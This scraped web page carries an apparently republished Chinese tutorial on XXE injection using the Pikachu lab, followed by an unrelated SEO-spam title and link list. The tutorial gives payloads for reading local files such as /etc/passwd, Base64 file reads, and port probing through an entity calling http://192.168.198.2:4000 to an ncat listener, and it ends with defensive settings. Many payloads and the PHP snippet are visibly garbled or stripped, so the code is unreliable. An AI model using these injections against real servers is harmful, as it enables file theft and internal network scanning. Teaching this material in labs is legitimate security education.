当前位置: 首页 > news >正文

擦边球网站怎么建设网站建设经费的函

擦边球网站怎么建设,网站建设经费的函,建设网站的那个公司好,microsoft做网站文章目录 一、漏洞原理二、验证payload三、没有回显时的验证四、漏洞特征五、读取文件六、Base64加密读取七、端口检测八、使用php检测端口九、dtd外部实体读取文件十、Xxe漏洞防御 一、漏洞原理 (1)XXE漏洞全称XML External Entity Injection,即xmI外部实体注入漏…

文章目录

  • 一、漏洞原理
  • 二、验证payload
  • 三、没有回显时的验证
  • 四、漏洞特征
  • 五、读取文件
  • 六、Base64加密读取
  • 七、端口检测
  • 八、使用php检测端口
  • 九、dtd外部实体读取文件
  • 十、Xxe漏洞防御

一、漏洞原理

(1)XXE漏洞全称XML External Entity Injection,即xmI外部实体注入漏洞, XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害,XML(也是一种语言)被设计用来传输和存储数据
(2)也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致漏洞
实验环境:windows pikachu xxe漏洞

二、验证payload

<?xml version = "1.0"?>

]>
&hacker;
在这里插入图片描述

三、没有回显时的验证

<?xml version = "1.0"?>

]>
&xxe;
在这里插入图片描述

四、漏洞特征

Accept里有application/xml的格式
在这里插入图片描述

五、读取文件

<?xml version = "1.0"?> ]> &f;

在这里插入图片描述

六、Base64加密读取

<?xml version = "1.0"?> ]> &f;

在这里插入图片描述
在这里插入图片描述

或则读取linux的/etc/passwd

<?xml version = "1.0"?> ]> &f;

七、端口检测

ncat -lvp 4000(端口可自定义)
使用以下语句尝试是否能够建立连接

<?xml version = "1.0"?> <!ENTITY xxe SYSTEM "http://192.168.198.2:4000/">

]>&xxe;
如果能够建立连接,那么服务器端的ncat会收到相应的请求信息。
在这里插入图片描述

八、使用php检测端口

<?php $xml=<<

]>
&xxe;
EOF;
d a t a = s i m p l e x m l l o a d s t r i n g ( data=simplexml_load_string( data=simplexmlloadstring(xml);
print_r($data);
?>
端口关闭的情况如下
在这里插入图片描述

开启时
在这里插入图片描述

九、dtd外部实体读取文件

<?xml version="1.0"?><!DOCTYPE note

[<!ENTITY % d SYSTEM "http://127.0.0.1/note.dtd">%d;]>
&eviltest;

在这里插入图片描述

十、Xxe漏洞防御

1、使用开发语言提供的禁用外部实体的方法
1.PHP:
libxml_disable_entity_loader(true);
2.JAVA:
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);
3.Python:
from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

http://www.yayakq.cn/news/368731/

相关文章:

  • 网站搜索功能怎样做自己可以制作微信小程序吗
  • 如何做好网站建设内容的策划保险网站大全
  • 各大搜索引擎网站登录入口企业vi设计公司定制
  • html5搭建手机网站wordpress文章中添加视频
  • 建网站免费咨询宁波网络建站
  • 企业网站的类型包括网站建设开发有限公司
  • wordpress制作官方网站网站制作怎么自己做
  • 什么网站可以做自媒体网页设计实验总结报告
  • 国外免费舆情网站有哪些软件智能小程序开发
  • 网络电商培训课程网站设计怎样重装电脑wordpress
  • 衡水网站制作企业网站内使用了哪些网络营销方式
  • 站长之家app代做课程设计的网站
  • 重庆大渡口建设网站哪个网站是教人做淘宝客的
  • 红酒哪个网站做的好微信公众号的微网站怎么做的
  • 网站软件下载app挖掘关键词爱站网
  • 开发一个大型网站需要多少钱建设网站成本预算
  • wordpress x站徐州建站费用
  • 扁平化网站后台网站页面设计怎么做
  • 网站首页像素网站头部优化文字怎么做
  • 群辉nas怎么做网站网络公司网站设计维护合同
  • 专业建站制作大数据营销心得体会
  • 西部空间官方网站wordpress数据搬移
  • 做推广都有什么网站怎么查看网站有没有备案
  • 简述一下网站的设计流程wordpress怎么在本地安装
  • 过期域名查询网站番禺有经验的网站建设
  • 如何在网站上推广自己的链接建立网站设计
  • 江西中创建设有限公司网站黄骅市天气预报15天气
  • 做网站什么主题好一个新手怎么做推广
  • xml的网站地图织梦制作企业网站建设需求调研表
  • 无锡高端网站建设公司哪家好网站建设网络推广平台